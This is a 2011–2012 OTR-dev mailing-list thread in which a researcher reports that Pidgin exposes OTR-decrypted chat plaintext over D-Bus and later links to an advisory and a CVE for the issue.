On 12/21/2011 02:49 AM, Dimitris Glynos wrote: > On 12/21/2011 01:11 AM, k...@hxbc.us wrote: >> On Tue, 20 Dec 2011 12:02:38 +0200, Dimitris Glynos wrote: >>> Hello all, >>> >>> I was wondering if pidgin could allow for certain chat types >>> to be flagged as private and not transmit these over dbus. >>> I don't know how much dbus is hardwired to pidgin (is it used >>> also for capturing the messages displayed on the pidgin GUI?) >>> but the fact that a local attacker can access OTR plaintext >>> from a dbus session monitor is quite unnerving. >> >> a local attacker can already ptrace the pidgin process and do >> pretty much anything. > > Yes, the word 'local' is used incorrectly in the original post. > Consider a remote attacker that exploits some app running > in the same desktop session as pidgin. It is trivial > to fork-exec a dbus session monitor from there and retrieve the > sensitive info. > > Now, regarding ptrace although it was generally possible in > the past to attach to processes of the same user, this has > been restricted somewhat in modern distro's. Specifically, > distro's like Ubuntu allow (non-root) ptrace only to > processes that are children of the ptrace-caller. > > For more info on this, have a look here: > https://wiki.ubuntu.com/SecurityTeam/Roadmap/KernelHardening#ptrace_Protection > > Hope this clarifies things a bit,
Coming back to this after a while. You may now find an advisory and a proof-of-concept script for the DBUS info leak here: http://census-labs.com/news/2012/02/25/pidgin-otr-info-leak/ This issue has received CVE-2012-1257. It would be good to see this issue addressed in the next release of pidgin and pidgin-otr. Most users would be surprised to find that their private chatting is somehow accessible to other apps.. Best regards, Dimitris -- http://census-labs.com -- IT security research, development and services _______________________________________________ OTR-dev mailing list OTR-dev@lists.cypherpunks.ca http://lists.cypherpunks.ca/mailman/listinfo/otr-dev